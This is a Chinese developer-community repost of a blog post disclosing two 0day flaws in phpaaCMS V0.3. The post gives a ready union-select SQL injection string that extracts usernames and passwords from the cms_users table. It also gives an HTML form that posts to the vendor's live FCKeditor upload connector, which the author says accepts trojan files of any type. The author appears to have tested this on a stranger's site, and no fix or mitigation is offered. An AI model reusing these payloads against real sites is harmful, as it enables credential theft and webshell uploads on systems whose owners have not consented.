开发者社区> 技术小阿哥> 正文

phpaaCMS V0.3 存在注射oday漏洞

简介:
+关注继续查看
偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
//您已经在您的SQL语法错误,检查手册,对应于你的MySQL语法的正确使用服务器版本附近'\ ''行1
哈哈既然爆错了,应该就戏了,继续猜字段 order by ,结果字段是15,但是又不知道数据库,马虎的去看了下官方的发现数据库是 cms_cms_users 在字段3和11分别是username 和 password
得出语句为:and%201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users
看了看官方也存在这个:
EXP:
漏洞2:
进去后台后 有个php的 Fckeditor编辑器 版本是2.4.2以下的吧。
EXP
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.phpaa.cn/include/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
可以上传任何格式的木马进去, 悲剧! 


本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/301004,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
干货丨windows内核www漏洞利用手法(修改版)
注:由于上次发出来的不完整,所以删除了重新发完整点的 前言:Gcow安全团队复眼小组致力于对漏洞的挖掘和研究,并且对于二进制和web漏洞方面都有所研究,有独立挖掘漏洞和独立复现漏洞的能力,本篇文章由Gcow安全团队复眼小组晏子霜师傅所写!
7 0
Bypass Anti-Virus——免杀姿势学习、记录、复现文档
Bypass Anti-Virus——免杀姿势学习、记录、复现文档
16 0
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
22 0
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
本人深感网络安全实验有点麻烦,花了一个晚上弄了部分,特此将笔记贡献造福后人,个人能力有限,还会继续更新。。。 汇报题目:**15分钟教你用 Python 写一个 arpspoof**(课件准备ing,如果弄完后续补上) 第一次网络安全实验(密码学)也是我做的,这里先放个自制工具:[Java实现密码学工具,集成了对称加密算法DES,AES,IDEA,公开加密算法RSA,ECC,散列算法MD5,SHA1,CRC32,以及RSA,DSA,ECDSA数字签名验证示例。](https://blog.csdn.net/weixin_43734095/article/details/105303562)
627 0
有效防护XSS,sql注射,代码执行,文件包含等多种高危漏洞方法
有效防护XSS,sql注射,代码执行,文件包含等多种高危漏洞方法
50 0
威胁快报|CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警(CNVD-C-2018-127157/CVE-2018-19127)
11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。
1992 0
shellshock漏洞利用
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396347 ...
1135 0
+关注
技术小阿哥
文章
问答
视频
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载